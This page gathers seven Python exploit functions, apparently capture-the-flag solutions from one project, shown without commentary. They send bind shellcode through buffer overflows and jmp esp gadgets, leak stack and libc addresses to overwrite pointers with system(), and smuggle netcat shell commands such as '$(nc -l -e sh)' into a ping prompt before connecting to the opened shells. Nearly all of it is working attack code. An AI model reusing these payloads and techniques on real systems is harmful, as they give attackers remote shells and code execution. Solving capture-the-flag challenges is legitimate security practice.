コード例 #1
0
ファイル: ex_200.py プロジェクト: notclu/ctf
def main_1stage():
    s = ctf.connect(HOST,PORT)

    # Password?
    ctf.recv(s)
    ctf.send(s, '\n') # Doesn't matter

    ctf.recv(s)
    
    # Payload
    ctf.send(s, bind_shellcode)
    ctf.send(s, 'A' * (0x208-len(bind_shellcode)))
    ctf.send(s, 'B' * 4)
    ctf.send(s, jump_esp_gadget)
    
    shell_code_offset = 0x208 + 4 + 4
    
    
    ''' sub esp, X = 81 EC XX XX XX XX '''
    sub_stack_asm = '\x81\xEC' + struct.pack('I', shell_code_offset)
    ctf.send(s, sub_stack_asm)
    ctf.send(s, '\xFF\xE4') # jmp esp

    ctf.send(s, '\n')
    
    ctf.shell(HOST, shell_port)
コード例 #2
0
ファイル: ex_ti.py プロジェクト: notclu/ctf
def main():
    s = ctf.connect(HOST,PORT)

    padded_shellcode = shellcode + ('\x90' * (8-(len(shellcode)%8)))
    double_shellcode = buf_to_double(padded_shellcode)
    double_shellcode = [str(c) for c in double_shellcode]

    # This will work fine for small numbers (ie < 4 Bytes)
    shellcode_location = struct.unpack('d', struct.pack('Q',number_stack_data_start))[0]
    shellcode_location = str(shellcode_location)

    # Write the shellcode into the number_stack
    for double in double_shellcode:
        if double:
            ctf.send(s, double + '\n')

    # Back up to the base
    ctf.send(s, 'c\n')
    ctf.recv(s)

    # Back up to send in the plt
    for i in range(0, qwords_to_send):
        ctf.send(s, 'b\n')
        ctf.recv(s)

    # Write the address of the shellcode
    ctf.send(s, shellcode_location + '\n')

    # Send a bad opcode to trigger send()
    ctf.send(s, 'm\n')

    s.close()

    ctf.shell(HOST, shell_port)
コード例 #3
0
ファイル: ex_back2skool.py プロジェクト: notclu/ctf
def main():
    s = ctf.connect(HOST,PORT)

    while 'exit' not in ctf.recv(s, dump=False):
        pass

    arr = string_to_int_array("nc -l -p %d -e/bin/sh " % shell_port)
    print(arr)

    val_base = 0x0804C040
    for num in arr:
        write_addr(s, val_base, num)
        val_base = val_base + 4

    libc_main = read_addr(s, 0x0804BF9C)
    offset_to_system = 0x237c0
    system_addr = libc_main + offset_to_system

    print('libc_main @ 0x%X' % libc_main)
    print('offset = %X' % offset_to_system)
    print('system @ 0x%X' % system_addr)

    execute(s, system_addr)

    ctf.shell(HOST, shell_port)
コード例 #4
0
ファイル: ex_shiftd.py プロジェクト: notclu/ctf
def main():
    s = ctf.connect(HOST,PORT)

    # password
    ctf.send(s, 'NowIsTheWinterOfOurDiscountTent\n')

    ctf.recv(s)

    ctf.send(s, '\n')

    diff_to_buff=1088
    welcome_string = ctf.recv(s)
    
    ptr_raw = welcome_string[9:15] + '\x00' * 2
    leaked_ptr = struct.unpack('Q', ptr_raw)[0]

    our_buf = leaked_ptr-diff_to_buff
    print('leaked_ptr = %X' % leaked_ptr)
    print('buf @ 0x%X' % our_buf)

    ctf.send(s, shellcode)
    ctf.send(s, 'A' * (0x420-len(shellcode)), dump=False)
    ctf.send(s, 'B' * 8)
    ctf.send(s, struct.pack('Q', our_buf))
    ctf.send(s,'\n')
    ctf.recv(s)

    ctf.shell(HOST, shell_port)

    s.close()
コード例 #5
0
ファイル: ex_100.py プロジェクト: notclu/ctf
def main():
    s = ctf.connect(HOST, PORT)

    # Password prompt
    ctf.recv(s)
    ctf.send(s, PASSWORD + '\n')

    # Wait for a prompt
    while '>' not in ctf.recv(s):
        pass

    '''
    1: Display Memory Information
    2: Display CPU Information
    3: Display Disk Information
    4: Display Processes
    5: Display Log
    6: Erase Log
    7: Ping
    8: Who is online
    9: Update Firmware
    10: Quit
    '''

    ctf.send(s, '7\n')

    # Which addr
    ctf.recv(s)

    ctf.send(s, '$(nc -l -e sh)\n')

    for i in range(1000,65536):
        if i != 3030:
            ctf.shell(HOST,i, tries=1, verbose=False)
コード例 #6
0
ファイル: ex_100.py プロジェクト: notclu/ctf
def main():
    s = ctf.connect(HOST,PORT)

    zlib_data = zlib.compress('')
    payload_len = len(zlib_data) + len(bind_shellcode) + 4 + 5

    ctf.send(s, struct.pack('I', payload_len))

    ctf.send(s,zlib_data)
    ctf.send(s, 'A' * (0xD-len(zlib_data)))
    ctf.send(s, struct.pack('I',0x8049043))
    ctf.send(s, bind_shellcode)
    
    ctf.shell(HOST, shell_port)
コード例 #7
0
ファイル: ex_200.py プロジェクト: notclu/ctf
def main_2stage():
    s = ctf.connect(HOST,PORT)

    # Password?
    ctf.recv(s)
    ctf.send(s, '\n') # Doesn't matter

    ctf.recv(s)
    
    # Payload
    ctf.send(s, 'A' * 0x208) # Buf
    ctf.send(s, 'B' * 4) # Saved ebp

    ctf.send(s, return_gadget * 4) # Move the sp up
    ctf.send(s, send_gadget)
    ctf.send(s, '\xDE\xAD\xD0\x0D') # just let this process die, we got what we came for
    ctf.send(s, struct.pack('I', 5)) # fd
    # A stack addr is going to be here
    # Then some size (don't care)
    # Then some flags (dont'care)
    ctf.send(s, '\n')    

    # Useless output from program
    ctf.recv(s)

    # Lets see what's on the stack
    stack_data = ctf.recv(s, recv_len=4096)

    # Nice we can see the part of the stack we've been working on

    # Pull out the address of what we just leaked
    chunks = ctf.chunks(stack_data, 4, adv=2)
    for c in chunks:
        if c == '\xDE\xAD\xD0\x0D':
            # adv the generator to the addr
            next(chunks)
            next(chunks)
            next(chunks)
            break


    leaked_addr = struct.unpack('I', next(chunks))[0]
    print("Got addr %X" % leaked_addr)

    bottom_of_original_frame = leaked_addr + 0x1e
    top_of_original_frame = bottom_of_original_frame - 0x150

    print("Bottom of original frame = %X" % bottom_of_original_frame)
    print("Top of original frame = %X" % top_of_original_frame)


    s.close() # This process has probably already died by now

    # Alright lets get some shellcode onto the stack and pop this
    s = ctf.connect(HOST,PORT)

    # Password?
    ctf.recv(s)
    ctf.send(s, '\n') # Doesn't matter

    ctf.recv(s)
    
    # Payload
    nop_sled_size=256 + 128
    
    ctf.send(s, '\x90' * nop_sled_size)
    ctf.send(s, bind_shellcode)
    ctf.send(s, 'A' * (0x208-len(bind_shellcode)-nop_sled_size))
    ctf.send(s, 'B' * 4) # Saved ebp
    ctf.send(s, struct.pack('I', top_of_original_frame)) # Thank you fork!
    ctf.send(s, '\n')
    ctf.shell(HOST, 31337)